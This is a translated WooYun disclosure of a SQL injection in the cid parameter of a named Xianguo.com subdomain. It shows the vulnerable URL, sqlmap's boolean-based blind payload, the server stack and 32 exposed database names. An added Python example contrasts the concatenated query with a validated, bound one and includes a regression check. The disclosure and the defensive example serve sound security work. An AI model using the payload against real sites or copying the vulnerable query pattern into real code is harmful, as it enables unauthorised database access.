WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reading -------- http://drop.zone.ci/
2016-01-24: Details have been sent to the vendor and are awaiting the vendor's handling. 2016-01-29: The vendor has deliberately ignored the vulnerability; the details are now disclosed to the public.
A site belonging to Xianguo.com (鲜果网) has a SQL injection vulnerability; 32 databases are exposed
http://m4.xianguo.com/homeindex/list?cid=1&tagid=6_31
Injection point: the cid parameter. Running sqlmap against it gives:
sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:
---
Parameter: cid (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: cid=(SELECT (CASE WHEN (1315=1315) THEN 1315 ELSE 1315*(SELECT 1315 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&tagid=6_31
---
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9
back-end DBMS: MySQL 5.0
32 databases are reachable through the injection:
available databases [32]:
[*] analytic
[*] bang
[*] book_new
[*] book_novel
[*] books
[*] client
[*] digital_market
[*] feed
[*] gdcnc
[*] groups
[*] igoli
[*] information_schema
[*] life_stream
[*] life_stream_doings
[*] life_stream_doings_meta
[*] life_stream_follow
[*] life_stream_link
[*] life_stream_publicline
[*] metadata
[*] mysql
[*] novel_spider
[*] partner
[*] recommend
[*] remark
[*] samsung
[*] short_url
[*] snslog
[*] spider
[*] taggroup
[*] test
[*] user
[*] wordpress
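The report shows a boolean-based blind injection where the whole `cid` operand is replaced by a subquery whose result depends on a condition. The following is an added example, not code from the report or from the site: it reconstructs the vulnerable handler pattern (string concatenation) next to a hardened one (strict integer validation plus a bound parameter), and includes a regression check that tells the two apart. It assumes an in-memory SQLite database with a constructed `items` table in place of the site's MySQL backend; the table, rows and probe values are all made up for the demonstration.

```python
import re
import sqlite3

# Constructed sample schema and data for the demonstration; the real site's
# tables and the MySQL backend are replaced by an in-memory SQLite database.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, cid INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO items (cid, title) VALUES (?, ?)",
        [(1, "item a"), (1, "item b"), (2, "item c")],
    )
    return conn


def list_vulnerable(conn, cid):
    # Vulnerable pattern (hypothetical reconstruction of the reported bug):
    # the raw request parameter is pasted into the SQL text, so a value such as
    # "(SELECT CASE WHEN ... END)" replaces the whole comparison operand.
    sql = "SELECT title FROM items WHERE cid = " + cid
    return [row[0] for row in conn.execute(sql)]


def list_hardened(conn, cid):
    # Hardened version: reject anything that is not a plain decimal integer
    # (a strict regex rather than str.isdigit, which also accepts Unicode digits),
    # then bind the value as a parameter so it can never alter the query text.
    if not isinstance(cid, str) or re.fullmatch(r"[0-9]+", cid) is None:
        raise ValueError("cid must be a decimal integer")
    sql = "SELECT title FROM items WHERE cid = ?"
    return [row[0] for row in conn.execute(sql, (int(cid),))]


# Two constructed parameter values that differ only in the truth of a condition,
# the same shape as the sqlmap "Parameter replace" payload in the report.
PROBE_TRUE = "(SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)"
PROBE_FALSE = "(SELECT CASE WHEN (1=2) THEN 1 ELSE 0 END)"


def leaks_condition(query_fn, conn):
    """Regression check: True if the response depends on an injected condition.

    A handler that lets the two probes produce different results is a
    boolean-based blind oracle; a handler that rejects the input does not leak.
    """
    try:
        true_rows = query_fn(conn, PROBE_TRUE)
        false_rows = query_fn(conn, PROBE_FALSE)
    except ValueError:
        return False  # input rejected before it reached the database
    return true_rows != false_rows


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable handler leaks:", leaks_condition(list_vulnerable, conn))  # True
    print("hardened handler leaks:  ", leaks_condition(list_hardened, conn))    # False
```

The check is useful as a unit test for the fix: the vulnerable handler returns the `cid=1` rows for the true probe and nothing for the false probe, which is exactly the one-bit oracle sqlmap exploits; the hardened handler rejects both probes before any SQL runs, so the result cannot depend on the condition. Validation alone is not the fix (a later code path may accept a different parameter), which is why the value is also bound as a parameter.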
This was a friendly test and I stopped here. Similar problems may well exist elsewhere, so a full check of the site is still worthwhile.
Fix: filter the input.
Severity: no impact (vendor ignored)
Ignored at: 2016-01-29 10:10
Vulnerability rank: 4 (WooYun rating)
None yet